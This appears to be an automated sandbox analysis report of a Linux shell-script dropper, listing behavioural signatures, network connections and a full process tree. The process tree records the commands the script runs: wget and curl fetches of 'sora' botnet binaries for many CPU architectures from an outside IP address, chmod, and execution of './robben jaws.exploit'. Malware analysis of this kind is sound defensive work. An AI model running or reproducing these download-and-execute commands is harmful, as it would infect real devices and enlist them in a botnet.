File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh N/A

Processes

/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh

[/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]

/tmp/robben

[./robben jaws.exploit]

Network

Country Destination Domain Proto
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-18 01:47

Reported

2024-10-18 01:50

Platform

debian9-mipsel-20240611-en

Max time kernel

42s

Max time network

45s

Command Line

[/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh N/A

Processes

/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh

[/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]

/tmp/robben

[./robben jaws.exploit]

Network

Country Destination Domain Proto
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp

Files

N/A